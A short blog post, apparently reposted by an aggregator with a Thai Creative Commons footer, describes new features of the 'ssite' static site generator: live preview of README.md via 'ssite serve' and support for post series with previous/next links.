Although GitHub now has a similar site rendering mode, it doesn't give you a live preview: if you run ssite serve on a GitHub project you will get a live preview of README.md and the project documentation.

Post series

I have added support for post series, that allow you to easily interlink posts with previous/next links.

You can see it in action on links and on An Italian song a day, an ongoing series that is currently each day posting a link to an Italian song.

Pages

Creative Commons License ลิขสิทธิ์ของบทความเป็นของเจ้าของบทความแต่ละชิ้น
ผลงานนี้ ใช้สัญญาอนุญาตของครีเอทีฟคอมมอนส์แบบ แสดงที่มา-อนุญาตแบบเดียวกัน 3.0 ที่ยังไม่ได้ปรับแก้